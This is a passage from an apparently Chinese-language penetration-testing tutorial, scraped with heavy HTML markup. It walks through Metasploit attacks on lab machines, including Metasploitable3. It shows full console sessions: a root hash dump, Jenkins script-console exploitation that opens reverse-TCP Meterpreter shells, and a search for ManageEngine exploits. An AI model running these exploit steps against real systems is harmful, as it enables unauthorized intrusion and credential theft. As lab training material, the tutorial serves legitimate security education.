                                                    [*<\/span>] 192.168<\/span>.177<\/span>.139<\/span>:80<\/span> -<\/span> Dumping<\/span> the<\/span> username<\/span> and<\/span> password<\/span> hash...<\/span><\/div>\n<\/div>\n<\/li>\n
                                                  7. \n
                                                    \n
                                                    <\/div>\n<\/div>\n
                                                    \n
                                                    [+<\/span>] 192.168<\/span>.177<\/span>.139<\/span>:80<\/span> -<\/span> Got<\/span> the<\/span> root's<\/span> hash:<\/span> 9c352326223a09bc610ff4919e611bed3fbb28f5<\/span> !<\/span><\/div>\n<\/div>\n<\/li>\n
                                                  8. \n
                                                    \n
                                                    <\/div>\n<\/div>\n
                                                    \n
                                                    [*<\/span>] Sending<\/span> stage<\/span> (38247<\/span> bytes)<\/span> to<\/span> 192.168<\/span>.177<\/span>.139<\/span><\/div>\n<\/div>\n<\/li>\n
                                                  9. \n
                                                    \n
                                                    <\/div>\n<\/div>\n
                                                    \n
                                                    [*<\/span>] Meterpreter<\/span> session<\/span> 14<\/span> opened<\/span> (192.168.177.143:4444<\/span> -><\/span> 192.168<\/span>.177<\/span>.139<\/span>:51063)<\/span> at<\/span> 2019-04-28 16:42:49<\/span> +0800<\/span><\/div>\n<\/div>\n<\/li>\n
                                                  10. \n
                                                    \n
                                                    <\/div>\n<\/div>\n
                                                    \n
                                                    [!]<\/span> This<\/span> exploit<\/span> may<\/span> require<\/span> manual<\/span> cleanup<\/span> of<\/span> 'bgxx.php'<\/span> on<\/span> the<\/span> target<\/span><\/div>\n<\/div>\n<\/li>\n
                                                  11. \n
                                                    \n
                                                    <\/div>\n<\/div>\n
                                                    \n
                                                    [!]<\/span> This<\/span> exploit<\/span> may<\/span> require<\/span> manual<\/span> cleanup<\/span> of<\/span> '\/var\/content\/module\/glt\/bgxx.php'<\/span> on<\/span> the<\/span> target<\/span><\/div>\n<\/div>\n<\/li>\n
                                                  12. \n
                                                    \n
                                                    <\/div>\n<\/div>\n
                                                    \n
                                                    <\/div>\n<\/div>\n<\/li>\n
                                                  13. \n
                                                    \n
                                                    <\/div>\n<\/div>\n
                                                    \n
                                                    meterpreter<\/span> ><\/span><\/div>\n<\/div>\n<\/li>\n
                                                  14. \n
                                                    \n
                                                    <\/div>\n<\/div>\n
                                                    \n
                                                    [+] 192.168.177.139:80 - Deleted bgxx.php<\/span><\/div>\n<\/div>\n<\/li>\n
                                                  15. \n
                                                    \n
                                                    <\/div>\n<\/div>\n
                                                    \n
                                                    meterpreter > getuid<\/span><\/div>\n<\/div>\n<\/li>\n
                                                  16. \n
                                                    \n
                                                    <\/div>\n<\/div>\n
                                                    \n
                                                    Server username: Administrator (0)<\/span><\/div>\n<\/div>\n<\/li>\n
                                                  17. \n
                                                    \n
                                                    <\/div>\n<\/div>\n
                                                    \n
                                                    meterpreter > sysinfo<\/span><\/div>\n<\/div>\n<\/li>\n
                                                  18. \n
                                                    \n
                                                    <\/div>\n<\/div>\n
                                                    \n
                                                    Computer : WIN-BGKRU85VR4H<\/span><\/div>\n<\/div>\n<\/li>\n
                                                  19. \n
                                                    \n
                                                    <\/div>\n<\/div>\n
                                                    \n
                                                    OS : Windows NT WIN-BGKRU85VR4H 6.1 build 7600 (Windows 7 Business Edition) i586<\/span><\/div>\n<\/div>\n<\/li>\n
                                                  20. \n
                                                    \n
                                                    <\/div>\n<\/div>\n
                                                    \n
                                                    Meterpreter : php\/windows<\/span><\/div>\n<\/div>\n<\/li>\n
                                                  21. \n
                                                    \n
                                                    <\/div>\n<\/div>\n
                                                    \n
                                                    meterpreter ><\/span><\/div>\n<\/div>\n<\/li>\n
                                                  22. \n
                                                    \n
                                                    <\/div>\n<\/div>\n
                                                    \n
                                                    <\/div>\n<\/div>\n<\/li>\n
                                                  23. \n
                                                    \n
                                                    <\/div>\n<\/div>\n
                                                    \n
                                                    \u590d\u5236\u4ee3\u7801<\/span><\/span><\/div>\n<\/div>\n<\/li>\n<\/ol>\n
                                                    <\/code><\/pre>\n
                                                    4\u3001\u653b\u51fbWindows \u670d\u52a1\u5668<\/h4>\n
                                                    \u5229\u7528\u4e4b\u524d\u6536\u96c6\u7684\u4fe1\u606f\uff0c\u6211\u4eec\u5c06\u5bf9Windows<\/code>\u670d\u52a1\u5668\u4f5c\u4e3a\u76ee\u6807\u8fdb\u884c\u6f0f\u6d1e\u5229\u7528\u3002\u672c\u8282\u6211\u4eec\u5c06\u4f7f\u7528Metasploitable3<\/code>\u4f5c\u4e3a\u9776\u673a\u3002<\/p>\n
                                                    \u51c6\u5907\u5de5\u4f5c<\/h5>\n
                                                    \u901a\u8fc7\u6536\u96c6\u7684\u4fe1\u606f\uff0c\u67e5\u627e\u6f0f\u6d1e\uff0c\u9009\u62e9\u5408\u9002\u7684\u6f0f\u6d1e\u91cc\u5229\u7528\u6a21\u5757\u3002<\/p>\n
                                                    \u4f7f\u7528services<\/code>\u67e5\u770b\u76ee\u6807Apache<\/code>\u670d\u52a1\u7248\u672c\u3002<\/p>\n
                                                    <\/code><\/pre>\n
                                                      \n
                                                    1. \n
                                                      \n
                                                      <\/div>\n<\/div>\n
                                                      \n
                                                      msf5<\/span> ><\/span> services<\/span> -p<\/span> 8020 <\/span>192.168<\/span>.177<\/span>.144<\/span><\/div>\n<\/div>\n<\/li>\n
                                                    2. \n
                                                      \n
                                                      <\/div>\n<\/div>\n
                                                      \n
                                                      Services<\/span><\/div>\n<\/div>\n<\/li>\n
                                                    3. \n
                                                      \n
                                                      <\/div>\n<\/div>\n
                                                      \n
                                                      ========<\/span><\/div>\n<\/div>\n<\/li>\n
                                                    4. \n
                                                      \n
                                                      <\/div>\n<\/div>\n
                                                      \n
                                                      <\/div>\n<\/div>\n<\/li>\n
                                                    5. \n
                                                      \n
                                                      <\/div>\n<\/div>\n
                                                      \n
                                                      host<\/span> port<\/span> proto<\/span> name<\/span> state<\/span> info<\/span><\/div>\n<\/div>\n<\/li>\n
                                                    6. \n
                                                      \n
                                                      <\/div>\n<\/div>\n
                                                      \n
                                                      ----<\/span> ----<\/span> -----<\/span> ----<\/span> -----<\/span> ----<\/span><\/div>\n<\/div>\n<\/li>\n
                                                    7. \n
                                                      \n
                                                      <\/div>\n<\/div>\n
                                                      \n
                                                      192.168<\/span>.177<\/span>.144<\/span> 8020 <\/span>tcp<\/span> http<\/span> open<\/span> Apache<\/span> httpd<\/span><\/div>\n<\/div>\n<\/li>\n
                                                    8. \n
                                                      \n
                                                      <\/div>\n<\/div>\n
                                                      \n
                                                      <\/div>\n<\/div>\n<\/li>\n
                                                    9. \n
                                                      \n
                                                      <\/div>\n<\/div>\n
                                                      \n
                                                      msf5<\/span> ><\/span><\/div>\n<\/div>\n<\/li>\n
                                                    10. \n
                                                      \n
                                                      <\/div>\n<\/div>\n
                                                      \n
                                                      \u590d\u5236\u4ee3\u7801<\/span><\/span><\/div>\n<\/div>\n<\/li>\n<\/ol>\n
                                                      <\/code><\/pre>\n
                                                      \u8bbf\u95ee\u76ee\u6807\u7ad9\u70b9<\/p>\n
                                                      <\/figcaption><\/figure>\n
                                                      \u901a\u8fc7\u6d4f\u89c8\u76ee\u6807\u7ad9\u70b9\uff0c\u6211\u4eec\u53ef\u4ee5\u5c1d\u8bd5\u4f7f\u7528\u5f31\u53e3\u4ee4\u8fdb\u884c\u767b\u5f55\uff0c\u6bd4\u5982\u00a0admin<\/code><\/p>\n
                                                      <\/figcaption><\/figure>\n
                                                      \u5c45\u7136\u767b\u5f55\u8fdb\u53bb\u4e86\u3002<\/p>\n
                                                      \u600e\u4e48\u505a<\/h5>\n
                                                      1\u3001\u67e5\u770b\u8fd0\u884c\u5728\u00a08484<\/code>\u7aef\u53e3\u7684\u00a0Jenkins-CI<\/code>\u670d\u52a1\u3002<\/p>\n
                                                      <\/code><\/pre>\n
                                                        \n
                                                      1. \n
                                                        \n
                                                        <\/div>\n<\/div>\n
                                                        \n
                                                        msf5<\/span> ><\/span> services<\/span> 192.168<\/span>.177<\/span>.144<\/span> -p<\/span> 8484<\/span><\/div>\n<\/div>\n<\/li>\n
                                                      2. \n
                                                        \n
                                                        <\/div>\n<\/div>\n
                                                        \n
                                                        Services<\/span><\/div>\n<\/div>\n<\/li>\n
                                                      3. \n
                                                        \n
                                                        <\/div>\n<\/div>\n
                                                        \n
                                                        ========<\/span><\/div>\n<\/div>\n<\/li>\n
                                                      4. \n
                                                        \n
                                                        <\/div>\n<\/div>\n
                                                        \n
                                                        <\/div>\n<\/div>\n<\/li>\n
                                                      5. \n
                                                        \n
                                                        <\/div>\n<\/div>\n
                                                        \n
                                                        host<\/span> port<\/span> proto<\/span> name<\/span> state<\/span> info<\/span><\/div>\n<\/div>\n<\/li>\n
                                                      6. \n
                                                        \n
                                                        <\/div>\n<\/div>\n
                                                        \n
                                                        ----<\/span> ----<\/span> -----<\/span> ----<\/span> -----<\/span> ----<\/span><\/div>\n<\/div>\n<\/li>\n
                                                      7. \n
                                                        \n
                                                        <\/div>\n<\/div>\n
                                                        \n
                                                        192.168<\/span>.177<\/span>.144<\/span> 8484 <\/span>tcp<\/span> http<\/span> open<\/span> Jetty<\/span> winstone-2.8<\/span><\/div>\n<\/div>\n<\/li>\n
                                                      8. \n
                                                        \n
                                                        <\/div>\n<\/div>\n
                                                        \n
                                                        \u590d\u5236\u4ee3\u7801<\/span><\/span><\/div>\n<\/div>\n<\/li>\n<\/ol>\n
                                                        <\/code><\/pre>\n
                                                        \u8fd9\u91cc\uff0c\u5e76\u6ca1\u6709\u663e\u793a\u00a0Jenkins<\/code>\uff0c\u6d4f\u89c8\u5668\u8bbf\u95ee\u770b\u770b<\/p>\n
                                                        <\/figcaption><\/figure>\n
                                                        \u786e\u5b9e\u662f\u4e00\u4e2a\u00a0Jenkins<\/code>\u670d\u52a1<\/p>\n
                                                        \u6211\u4eec\u4f7f\u7528search jenkins<\/code>\u641c\u7d22\u53ef\u5229\u7528\u7684\u6a21\u5757<\/p>\n
                                                        <\/code><\/pre>\n
                                                          \n
                                                        1. \n
                                                          \n
                                                          <\/div>\n<\/div>\n
                                                          \n
                                                          msf5<\/span> ><\/span> search<\/span> jenkins<\/span><\/div>\n<\/div>\n<\/li>\n
                                                        2. \n
                                                          \n
                                                          <\/div>\n<\/div>\n
                                                          \n
                                                          Matching<\/span> Modules<\/span><\/div>\n<\/div>\n<\/li>\n
                                                        3. \n
                                                          \n
                                                          <\/div>\n<\/div>\n
                                                          \n
                                                          ================<\/span><\/div>\n<\/div>\n<\/li>\n
                                                        4. \n
                                                          \n
                                                          <\/div>\n<\/div>\n
                                                          \n
                                                          <\/div>\n<\/div>\n<\/li>\n
                                                        5. \n
                                                          \n
                                                          <\/div>\n<\/div>\n
                                                          \n
                                                          # Name Disclosure Date Rank Check Description <\/span><\/div>\n<\/div>\n<\/li>\n
                                                        6. \n
                                                          \n
                                                          <\/div>\n<\/div>\n
                                                          \n
                                                          -<\/span> ----<\/span> ---------------<\/span> ----<\/span> -----<\/span> -----------<\/span><\/div>\n<\/div>\n<\/li>\n
                                                        7. \n
                                                          \n
                                                          <\/div>\n<\/div>\n
                                                          \n
                                                          1<\/span> auxiliary\/gather\/jenkins_cred_recovery<\/span> normal<\/span> Yes<\/span> Jenkins<\/span> Domain<\/span> Credential<\/span> Recovery<\/span><\/div>\n<\/div>\n<\/li>\n
                                                        8. \n
                                                          \n
                                                          <\/div>\n<\/div>\n
                                                          \n
                                                          2<\/span> auxiliary\/scanner\/http\/jenkins_command<\/span> normal<\/span> Yes<\/span> Jenkins-CI<\/span> Unauthenticated<\/span> Script-Console<\/span> Scanner<\/span><\/div>\n<\/div>\n<\/li>\n
                                                        9. \n
                                                          \n
                                                          <\/div>\n<\/div>\n
                                                          \n
                                                          3<\/span> auxiliary\/scanner\/http\/jenkins_enum<\/span> normal<\/span> Yes<\/span> Jenkins-CI<\/span> Enumeration<\/span><\/div>\n<\/div>\n<\/li>\n
                                                        10. \n
                                                          \n
                                                          <\/div>\n<\/div>\n
                                                          \n
                                                          4<\/span> auxiliary\/scanner\/http\/jenkins_login<\/span> normal<\/span> Yes<\/span> Jenkins-CI<\/span> Login<\/span> Utility<\/span><\/div>\n<\/div>\n<\/li>\n
                                                        11. \n
                                                          \n
                                                          <\/div>\n<\/div>\n
                                                          \n
                                                          5<\/span> auxiliary\/scanner\/jenkins\/jenkins_udp_broadcast_enum<\/span> normal<\/span> No<\/span> Jenkins<\/span> Server<\/span> Broadcast<\/span> Enumeration<\/span><\/div>\n<\/div>\n<\/li>\n
                                                        12. \n
                                                          \n
                                                          <\/div>\n<\/div>\n
                                                          \n
                                                          6<\/span> exploit\/linux\/misc\/jenkins_java_deserialize<\/span> 2015-11-18 <\/span>excellent<\/span> Yes<\/span> Jenkins<\/span> CLI<\/span> RMI<\/span> Java<\/span> Deserialization<\/span> Vulnerability<\/span><\/div>\n<\/div>\n<\/li>\n
                                                        13. \n
                                                          \n
                                                          <\/div>\n<\/div>\n
                                                          \n
                                                          7<\/span> exploit\/linux\/misc\/jenkins_ldap_deserialize<\/span> 2016-11-16 <\/span>excellent<\/span> Yes<\/span> Jenkins<\/span> CLI<\/span> HTTP<\/span> Java<\/span> Deserialization<\/span> Vulnerability<\/span><\/div>\n<\/div>\n<\/li>\n
                                                        14. \n
                                                          \n
                                                          <\/div>\n<\/div>\n
                                                          \n
                                                          8<\/span> exploit\/linux\/misc\/opennms_java_serialize<\/span> 2015-11-06 <\/span>normal<\/span> No<\/span> OpenNMS<\/span> Java<\/span> Object<\/span> Unserialization<\/span> Remote<\/span> Code<\/span> Execution<\/span><\/div>\n<\/div>\n<\/li>\n
                                                        15. \n
                                                          \n
                                                          <\/div>\n<\/div>\n
                                                          \n
                                                          9<\/span> exploit\/multi\/http\/jenkins_metaprogramming<\/span> 2019-01-08 <\/span>excellent<\/span> Yes<\/span> Jenkins<\/span> ACL<\/span> Bypass<\/span> and<\/span> Metaprogramming<\/span> RCE<\/span><\/div>\n<\/div>\n<\/li>\n
                                                        16. \n
                                                          \n
                                                          <\/div>\n<\/div>\n
                                                          \n
                                                          10<\/span> exploit\/multi\/http\/jenkins_script_console<\/span> 2013-01-18 <\/span>good<\/span> Yes<\/span> Jenkins-CI<\/span> Script-Console<\/span> Java<\/span> Execution<\/span><\/div>\n<\/div>\n<\/li>\n
                                                        17. \n
                                                          \n
                                                          <\/div>\n<\/div>\n
                                                          \n
                                                          11<\/span> exploit\/multi\/http\/jenkins_xstream_deserialize<\/span> 2016-02-24 <\/span>excellent<\/span> Yes<\/span> Jenkins<\/span> XStream<\/span> Groovy<\/span> classpath<\/span> Deserialization<\/span> Vulnerability<\/span><\/div>\n<\/div>\n<\/li>\n
                                                        18. \n
                                                          \n
                                                          <\/div>\n<\/div>\n
                                                          \n
                                                          12<\/span> exploit\/windows\/misc\/ibm_websphere_java_deserialize<\/span> 2015-11-06 <\/span>excellent<\/span> No<\/span> IBM<\/span> WebSphere<\/span> RCE<\/span> Java<\/span> Deserialization<\/span> Vulnerability<\/span><\/div>\n<\/div>\n<\/li>\n
                                                        19. \n
                                                          \n
                                                          <\/div>\n<\/div>\n
                                                          \n
                                                          13<\/span> post\/multi\/gather\/jenkins_gather<\/span> normal<\/span> No<\/span> Jenkins<\/span> Credential<\/span> Collector<\/span><\/div>\n<\/div>\n<\/li>\n
                                                        20. \n
                                                          \n
                                                          <\/div>\n<\/div>\n
                                                          \n
                                                          msf5<\/span> ><\/span><\/div>\n<\/div>\n<\/li>\n
                                                        21. \n
                                                          \n
                                                          <\/div>\n<\/div>\n
                                                          \n
                                                          \u590d\u5236\u4ee3\u7801<\/span><\/span><\/div>\n<\/div>\n<\/li>\n<\/ol>\n
                                                          <\/code><\/pre>\n
                                                          \u4f7f\u7528Jenkins-CI Script-Console Java Execution<\/code>\u6a21\u5757<\/p>\n
                                                          <\/code><\/pre>\n
                                                            \n
                                                          1. \n
                                                            \n
                                                            <\/div>\n<\/div>\n
                                                            \n
                                                            msf5<\/span> ><\/span> use<\/span> exploit\/multi\/http\/jenkins_script_console<\/span><\/div>\n<\/div>\n<\/li>\n
                                                          2. \n
                                                            \n
                                                            <\/div>\n<\/div>\n
                                                            \n
                                                            msf5<\/span> exploit(multi\/http\/jenkins_script_console)<\/span> ><\/span> set<\/span> RHOSTS<\/span> 192.168<\/span>.177<\/span>.144<\/span><\/div>\n<\/div>\n<\/li>\n
                                                          3. \n
                                                            \n
                                                            <\/div>\n<\/div>\n
                                                            \n
                                                            RHOSTS<\/span> =><\/span> 192.168<\/span>.177<\/span>.144<\/span><\/div>\n<\/div>\n<\/li>\n
                                                          4. \n
                                                            \n
                                                            <\/div>\n<\/div>\n
                                                            \n
                                                            msf5<\/span> exploit(multi\/http\/jenkins_script_console)<\/span> ><\/span> set<\/span> RPORT<\/span> 8484<\/span><\/div>\n<\/div>\n<\/li>\n
                                                          5. \n
                                                            \n
                                                            <\/div>\n<\/div>\n
                                                            \n
                                                            RPORT<\/span> =><\/span> 8484<\/span><\/div>\n<\/div>\n<\/li>\n
                                                          6. \n
                                                            \n
                                                            <\/div>\n<\/div>\n
                                                            \n
                                                            msf5<\/span> exploit(multi\/http\/jenkins_script_console)<\/span> ><\/span> set<\/span> TARGETURI<\/span> \/<\/span><\/div>\n<\/div>\n<\/li>\n
                                                          7. \n
                                                            \n
                                                            <\/div>\n<\/div>\n
                                                            \n
                                                            TARGETURI<\/span> =><\/span> \/<\/span><\/div>\n<\/div>\n<\/li>\n
                                                          8. \n
                                                            \n
                                                            <\/div>\n<\/div>\n
                                                            \n
                                                            msf5<\/span> exploit(multi\/http\/jenkins_script_console)<\/span> ><\/span> exploit<\/span><\/div>\n<\/div>\n<\/li>\n
                                                          9. \n
                                                            \n
                                                            <\/div>\n<\/div>\n
                                                            \n
                                                            <\/div>\n<\/div>\n<\/li>\n
                                                          10. \n
                                                            \n
                                                            <\/div>\n<\/div>\n
                                                            \n
                                                            [*<\/span>] Started<\/span> reverse<\/span> TCP<\/span> handler<\/span> on<\/span> 192.168<\/span>.177<\/span>.143<\/span>:4444<\/span><\/div>\n<\/div>\n<\/li>\n
                                                          11. \n
                                                            \n
                                                            <\/div>\n<\/div>\n
                                                            \n
                                                            [*<\/span>] Checking<\/span> access<\/span> to<\/span> the<\/span> script<\/span> console<\/span><\/div>\n<\/div>\n<\/li>\n
                                                          12. \n
                                                            \n
                                                            <\/div>\n<\/div>\n
                                                            \n
                                                            [*<\/span>] No<\/span> authentication<\/span> required,<\/span> skipping<\/span> login...<\/span><\/div>\n<\/div>\n<\/li>\n
                                                          13. \n
                                                            \n
                                                            <\/div>\n<\/div>\n
                                                            \n
                                                            [*<\/span>] 192.168<\/span>.177<\/span>.144<\/span>:8484<\/span> -<\/span> Sending<\/span> command<\/span> stager...<\/span><\/div>\n<\/div>\n<\/li>\n
                                                          14. \n
                                                            \n
                                                            <\/div>\n<\/div>\n
                                                            \n
                                                            [*<\/span>] Command<\/span> Stager<\/span> progress<\/span> -<\/span> 2.06<\/span>%<\/span> done<\/span> (2048\/99626<\/span> bytes)<\/span><\/div>\n<\/div>\n<\/li>\n
                                                          15. \n
                                                            \n
                                                            <\/div>\n<\/div>\n
                                                            \n
                                                            [*<\/span>] Command<\/span> Stager<\/span> progress<\/span> -<\/span> 4.11<\/span>%<\/span> done<\/span> (4096\/99626<\/span> bytes)<\/span><\/div>\n<\/div>\n<\/li>\n
                                                          16. \n
                                                            \n
                                                            <\/div>\n<\/div>\n
                                                            \n
                                                            [*<\/span>] Command<\/span> Stager<\/span> progress<\/span> -<\/span> 6.17<\/span>%<\/span> done<\/span> (6144\/99626<\/span> bytes)<\/span><\/div>\n<\/div>\n<\/li>\n
                                                          17. \n
                                                            \n
                                                            <\/div>\n<\/div>\n
                                                            \n
                                                            ....<\/span><\/div>\n<\/div>\n<\/li>\n
                                                          18. \n
                                                            \n
                                                            <\/div>\n<\/div>\n
                                                            \n
                                                            [*<\/span>] Command<\/span> Stager<\/span> progress<\/span> -<\/span> 98.67<\/span>%<\/span> done<\/span> (98304\/99626<\/span> bytes)<\/span><\/div>\n<\/div>\n<\/li>\n
                                                          19. \n
                                                            \n
                                                            <\/div>\n<\/div>\n
                                                            \n
                                                            [*<\/span>] Command<\/span> Stager<\/span> progress<\/span> -<\/span> 100.00<\/span>%<\/span> done<\/span> (99626\/99626<\/span> bytes)<\/span><\/div>\n<\/div>\n<\/li>\n
                                                          20. \n
                                                            \n
                                                            <\/div>\n<\/div>\n
                                                            \n
                                                            [*<\/span>] Sending<\/span> stage<\/span> (179779<\/span> bytes)<\/span> to<\/span> 192.168<\/span>.177<\/span>.144<\/span><\/div>\n<\/div>\n<\/li>\n
                                                          21. \n
                                                            \n
                                                            <\/div>\n<\/div>\n
                                                            \n
                                                            [*<\/span>] Meterpreter<\/span> session<\/span> 2<\/span> opened<\/span> (192.168.177.143:4444<\/span> -><\/span> 192.168<\/span>.177<\/span>.144<\/span>:49555)<\/span> at<\/span> 2019-04-26 17:32:58<\/span> +0800<\/span><\/div>\n<\/div>\n<\/li>\n
                                                          22. \n
                                                            \n
                                                            <\/div>\n<\/div>\n
                                                            \n
                                                            <\/div>\n<\/div>\n<\/li>\n
                                                          23. \n
                                                            \n
                                                            <\/div>\n<\/div>\n
                                                            \n
                                                            meterpreter<\/span> ><\/span> sysinfo<\/span><\/div>\n<\/div>\n<\/li>\n
                                                          24. \n
                                                            \n
                                                            <\/div>\n<\/div>\n
                                                            \n
                                                            Computer :<\/span> METASPLOITABLE3<\/span><\/div>\n<\/div>\n<\/li>\n
                                                          25. \n
                                                            \n
                                                            <\/div>\n<\/div>\n
                                                            \n
                                                            OS :<\/span> Windows<\/span> 2008 <\/span>R2<\/span> (Build<\/span> 7601<\/span>,<\/span> Service<\/span> Pack<\/span> 1<\/span>).<\/span><\/div>\n<\/div>\n<\/li>\n
                                                          26. \n
                                                            \n
                                                            <\/div>\n<\/div>\n
                                                            \n
                                                            Architecture :<\/span> x64<\/span><\/div>\n<\/div>\n<\/li>\n
                                                          27. \n
                                                            \n
                                                            <\/div>\n<\/div>\n
                                                            \n
                                                            System Language :<\/span> en_US<\/span><\/div>\n<\/div>\n<\/li>\n
                                                          28. \n
                                                            \n
                                                            <\/div>\n<\/div>\n
                                                            \n
                                                            Domain :<\/span> WORKGROUP<\/span><\/div>\n<\/div>\n<\/li>\n
                                                          29. \n
                                                            \n
                                                            <\/div>\n<\/div>\n
                                                            \n
                                                            Logged On Users :<\/span> 2<\/span><\/div>\n<\/div>\n<\/li>\n
                                                          30. \n
                                                            \n
                                                            <\/div>\n<\/div>\n
                                                            \n
                                                            Meterpreter :<\/span> x86\/windows<\/span><\/div>\n<\/div>\n<\/li>\n
                                                          31. \n
                                                            \n
                                                            <\/div>\n<\/div>\n
                                                            \n
                                                            meterpreter<\/span> ><\/span> getuid<\/span><\/div>\n<\/div>\n<\/li>\n
                                                          32. \n
                                                            \n
                                                            <\/div>\n<\/div>\n
                                                            \n
                                                            Server username:<\/span> NT<\/span> AUTHORITY\\LOCAL<\/span> SERVICE<\/span><\/div>\n<\/div>\n<\/li>\n
                                                          33. \n
                                                            \n
                                                            <\/div>\n<\/div>\n
                                                            \n
                                                            meterpreter<\/span> ><\/span><\/div>\n<\/div>\n<\/li>\n
                                                          34. \n
                                                            \n
                                                            <\/div>\n<\/div>\n
                                                            \n
                                                            \u590d\u5236\u4ee3\u7801<\/span><\/span><\/div>\n<\/div>\n<\/li>\n<\/ol>\n
                                                            <\/code><\/pre>\n
                                                            \u653b\u51fbManageEngine Desktop Central 9<\/code><\/p>\n
                                                            <\/code><\/pre>\n
                                                              \n
                                                            1. \n
                                                              \n
                                                              <\/div>\n<\/div>\n
                                                              \n
                                                              <\/div>\n<\/div>\n<\/li>\n
                                                            2. \n
                                                              \n
                                                              <\/div>\n<\/div>\n
                                                              \n
                                                              msf5<\/span> exploit(multi\/http\/jenkins_script_console)<\/span> ><\/span> search<\/span> type:exploit<\/span> Manageengine<\/span><\/div>\n<\/div>\n<\/li>\n
                                                            3. \n
                                                              \n
                                                              <\/div>\n<\/div>\n
                                                              \n
                                                              <\/div>\n<\/div>\n<\/li>\n
                                                            4. \n
                                                              \n
                                                              <\/div>\n<\/div>\n
                                                              \n
                                                              Matching<\/span> Modules<\/span><\/div>\n<\/div>\n<\/li>\n
                                                            5. \n
                                                              \n
                                                              <\/div>\n<\/div>\n
                                                              \n
                                                              ================<\/span><\/div>\n<\/div>\n<\/li>\n
                                                            6. \n
                                                              \n
                                                              <\/div>\n<\/div>\n
                                                              \n
                                                              <\/div>\n<\/div>\n<\/li>\n
                                                            7. \n
                                                              \n
                                                              <\/div>\n<\/div>\n
                                                              \n
                                                              # Name Disclosure Date Rank Check Description<\/span><\/div>\n<\/div>\n<\/li>\n
                                                            8. \n
                                                              \n
                                                              <\/div>\n<\/div>\n
                                                              \n
                                                              -<\/span> ----<\/span> ---------------<\/span> ----<\/span> -----<\/span> -----------<\/span><\/div>\n<\/div>\n<\/li>\n
                                                            9. \n
                                                              \n
                                                              <\/div>\n<\/div>\n
                                                              \n
                                                              1<\/span> exploit\/multi\/http\/eventlog_file_upload<\/span> 2014-08-31 <\/span>excellent<\/span> Yes<\/span> ManageEngine<\/span> Eventlog<\/span> Analyzer<\/span> Arbitrary<\/span> File<\/span> Upload<\/span><\/div>\n<\/div>\n<\/li>\n
                                                            10. \n
                                                              \n
                                                              <\/div>\n<\/div>\n
                                                              \n
                                                              2<\/span> exploit\/multi\/http\/manage_engine_dc_pmp_sqli<\/span> 2014-06-08 <\/span>excellent<\/span> Yes<\/span> ManageEngine<\/span> Desktop<\/span> Central<\/span> \/<\/span> Password<\/span> Manager<\/span> LinkViewFetchServlet.dat<\/span> SQL<\/span> Injection<\/span><\/div>\n<\/div>\n<\/li>\n
                                                            11. \n
                                                              \n
                                                              <\/div>\n<\/div>\n
                                                              \n
                                                              3<\/span> exploit\/multi\/http\/manageengine_auth_upload<\/span> 2014-12-15 <\/span>excellent<\/span> Yes<\/span> ManageEngine<\/span> Multiple<\/span> Products<\/span> Authenticated<\/span> File<\/span> Upload<\/span><\/div>\n<\/div>\n<\/li>\n
                                                            12. \n
                                                              \n
                                                              <\/div>\n<\/div>\n
                                                              \n
                                                              4<\/span> exploit\/multi\/http\/manageengine_sd_uploader<\/span> 2015-08-20 <\/span>excellent<\/span> Yes<\/span> ManageEngine<\/span> ServiceDesk<\/span> Plus<\/span> Arbitrary<\/span> File<\/span> Upload<\/span><\/div>\n<\/div>\n<\/li>\n
                                                            13. \n
                                                              \n
                                                              <\/div>\n<\/div>\n
                                                              \n
                                                              5<\/span> exploit\/multi\/http\/manageengine_search_sqli<\/span> 2012-10-18 <\/span>excellent<\/span> Yes<\/span> ManageEngine<\/span> Security<\/span> Manager<\/span> Plus<\/span> 5.5<\/span> Build<\/span> 5505 <\/span>SQL<\/span> Injection<\/span><\/div>\n<\/div>\n<\/li>\n
                                                            14. \n
                                                              \n
                                                              <\/div>\n<\/div>\n
                                                              \n
                                                              6<\/span> exploit\/multi\/http\/opmanager_socialit_file_upload<\/span> 2014-09-27 <\/span>excellent<\/span> Yes<\/span> ManageEngine<\/span> OpManager<\/span> and<\/span> Social<\/span> IT<\/span> Arbitrary<\/span> File<\/span> Upload<\/span><\/div>\n<\/div>\n<\/li>\n
                                                            15. \n
                                                              \n
                                                              <\/div>\n<\/div>\n
                                                              \n
                                                              7<\/span> exploit\/windows\/http\/desktopcentral_file_upload<\/span> 2013-11-11 <\/span>excellent<\/span> Yes<\/span> ManageEngine<\/span> Desktop<\/span> Central<\/span> AgentLogUpload<\/span> Arbitrary<\/span> File<\/span> Upload<\/span><\/div>\n<\/div>\n<\/li>\n
                                                            16. \n
                                                              \n
                                                              <\/div>\n<\/div>\n
                                                              \n
                                                              8<\/span> exploit\/windows\/http\/desktopcentral_statusupdate_upload<\/span> 2014-08-31 <\/span>excellent<\/span> Yes<\/span> ManageEngine<\/span> Desktop<\/span> Central<\/span> StatusUpdate<\/span> Arbitrary<\/span> File<\/span> Upload<\/span><\/div>\n<\/div>\n<\/li>\n
                                                            17. \n
                                                              \n
                                                              <\/div>\n<\/div>\n
                                                              \n
                                                              9<\/span> exploit\/windows\/http\/manage_engine_opmanager_rce<\/span> 2015-09-14 <\/span>manual<\/span> Yes<\/span> ManageEngine<\/span> OpManager<\/span> Remote<\/span> Code<\/span> Execution<\/span><\/div>\n<\/div>\n<\/li>\n
                                                            18. \n
                                                              \n
                                                              <\/div>\n<\/div>\n
                                                              \n
                                                              10<\/span> exploit\/windows\/http\/manageengine_adshacluster_rce<\/span> 2018-06-28 <\/span>excellent<\/span> Yes<\/span> Manage<\/span> Engine<\/span> Exchange<\/span> Reporter<\/span> Plus<\/span> Unauthenticated<\/span> RCE<\/span><\/div>\n<\/div>\n<\/li>\n
                                                            19. \n
                                                              \n
                                                              <\/div>\n<\/div>\n
                                                              \n
                                                              11<\/span> exploit\/windows\/http\/manageengine_appmanager_exec<\/span> 2018-03-07 <\/span>excellent<\/span> Yes<\/span> ManageEngine<\/span> Applications<\/span> Manager<\/span> Remote<\/span> Code<\/span> Execution<\/span><\/div>\n<\/div>\n<\/li>\n
                                                            20. \n
                                                              \n
                                                              <\/div>\n<\/div>\n
                                                              \n
                                                              12<\/span> exploit\/windows\/http\/manageengine_apps_mngr<\/span> 2011-04-08 <\/span>average<\/span> No<\/span> ManageEngine<\/span> Applications<\/span> Manager<\/span> Authenticated<\/span> Code<\/span> Execution<\/span><\/div>\n<\/div>\n<\/li>\n
                                                            21. \n
                                                              \n
                                                              <\/div>\n<\/div>\n
                                                              \n
